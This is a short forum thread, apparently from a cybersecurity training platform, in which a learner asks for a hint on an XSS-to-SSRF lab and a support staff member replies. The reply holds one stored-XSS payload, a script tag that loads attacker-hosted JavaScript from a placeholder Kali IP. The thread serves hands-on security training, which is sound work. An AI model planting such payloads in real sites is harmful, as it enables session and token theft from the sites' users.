Forum Discussion

Bronze I

3 months ago

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

ChrisKershaw

Community Support

3 months ago

Hey shubham

Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.

I'll be happy to share a hint to help you with your lab attempt:

In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

Will you see if this helps you with your attempt?

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

New Cyber Threat Intelligence Lab release!

Re: What are some good labs for learning the basics of malware analysis?

This Week in The Human Connection

New CTI Labs: Palo Alto Expedition Critical Vulnerabilities

Recent Discussions

Open Source Intelligence (OSINT): Boarding Pass

SuperSonic: Ep.6 – TEMPLE

Events & Breaches: Magecart Skimmer

CVE-2022-29799/CVE-2022-29800 (Nimbuspwn) – Defensive

Zeek - Demonstrate Your Skills